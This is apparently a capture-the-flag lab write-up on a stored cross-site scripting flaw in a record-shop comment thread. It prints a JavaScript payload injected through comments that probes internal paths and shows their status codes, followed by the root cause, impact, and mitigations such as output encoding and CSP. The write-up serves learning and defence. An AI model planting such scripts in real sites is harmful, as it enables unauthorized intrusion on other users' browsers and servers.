Stored XSS – Internal Endpoint Enumeration Through Comment Injection | Crate & Sleeve
Lab Link
Lab: Crate & Sleeve
Overview
The Crate & Sleeve challenge appears to demonstrate a Stored Cross-Site Scripting (Stored XSS) vulnerability within community comment functionality.
The application allowed users to submit content that was later rendered in the browser without proper sanitization.
Because JavaScript execution became possible, browser-side actions could be performed automatically against application endpoints.
Instead of immediately targeting cookie theft or account takeover, JavaScript was used for endpoint discovery and application mapping.
Objective
Abuse comment functionality to execute JavaScript and enumerate internal application resources.
Vulnerability Classification Hierarchy
1
2
3
4
5
OWASP Category
└── A05: Injection
└── Cross-Site Scripting (XSS)
└── Stored XSS
└── Unsanitized User Input Rendered in Comments
Reconnaissance
The challenge description highlighted:
1
The comment thread is where regulars haggle over pressing variants and condition grades
Comment systems are common attack surfaces because they frequently render user-controlled content.
Testing indicated JavaScript execution was possible.
Payload used:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<script>
const paths=[
'/admin.php',
'/moderator.php',
'/dashboard.php',
'/comments.php',
'/comment.php',
'/profile.php',
'/users.php',
'/flag',
'/flag.php',
'/flag.txt',
'/robots.txt'
];
document.body.innerHTML="<h2>Results</h2>";
paths.forEach(p=>{
fetch(p)
.then(r=>document.body.innerHTML+=
`<div>${p} : ${r.status}</div>`)
.catch(()=>{});
});
</script>
Analysis
The script attempted to:
- Request multiple application endpoints
- Capture HTTP response codes
- Display discovered results inside the page
This effectively created a lightweight browser-side directory enumeration mechanism.
Application responses:
1
2
3
4
5
6
7
8
9
10
11
12
13
/robots.txt : 200
/flag.php : 404
/moderator.php : 404
/flag.txt : 404
/admin.php : 404
/profile.php : 404
/dashboard.php : 404
Server information:
1
Apache/2.4.67 (Debian)
The successful response from:
1
/robots.txt
suggested further information disclosure opportunities.
Proof of Exploitation
Confirmed capabilities:
1
2
3
4
5
6
7
Comment Input
↓
Stored JavaScript
↓
Victim Browser Execution
↓
Internal Endpoint Enumeration
This verified successful JavaScript execution within the application context.
Root Cause
The application likely rendered comments similar to:
1
echo $_POST['comment'];
instead of safely encoding output:
1
2
3
echo htmlspecialchars(
$_POST['comment']
);
As a result:
1
2
3
<script>
...
</script>
was interpreted as executable code rather than plain text.
Impact
Stored XSS can lead to:
- Session theft
- Account takeover
- Administrative compromise
- CSRF abuse
- Internal endpoint discovery
- Credential theft
- Sensitive information disclosure
Stored XSS often becomes more severe than reflected XSS because payloads execute automatically for other users.
Mitigation
Encode output before rendering
Bad:
1
echo $comment;
Secure:
1
2
3
echo htmlspecialchars(
$comment
);
Apply Content Security Policy
Example:
1
2
Content-Security-Policy:
default-src 'self'
Validate and sanitize user input
Restrict:
1
2
3
4
<script>
onerror=
onload=
javascript:
Avoid rendering raw HTML
User content should generally be treated as text.
Real-World Insight
Stored XSS commonly appears in:
- Comments
- Forums
- Chat systems
- Support tickets
- User profiles
- Review platforms
A common assumption is:
1
Only trusted users can post here
Attackers routinely abuse trusted content areas because users and administrators often interact with them automatically.
Remaining Step
The final exploitation path and flag retrieval step were not included in the captured notes and should be added once completed.